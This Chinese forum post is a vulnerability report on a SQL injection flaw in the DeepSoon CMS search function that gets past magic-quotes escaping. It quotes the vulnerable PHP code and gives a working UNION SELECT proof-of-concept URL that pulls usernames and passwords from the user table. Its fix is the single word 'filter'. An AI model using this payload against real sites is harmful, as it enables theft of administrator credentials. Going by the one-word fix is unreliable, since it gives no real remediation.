灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2295回复:0

深喉cms注射漏洞(bypass GPC)及修复方案

楼主#
更多 发布于:2011-09-08 11:11
  简要描述:
  深喉cms中由于对数据处理不严导致一个SQL注射漏洞
  详细说明:
  global $db,$request;
  $keyword = urldecode($request['keyword']);
  switch($modelName)
  {
  case 'article':
  $sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc";
  return $db->get_results($sql);
  break;
  注射有木有,有木有!!!
  http://www.****.com /foo/?p=24;m=search;keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
  漏洞证明:
  修复方案:
  过滤

喜欢0 评分0
游客

返回顶部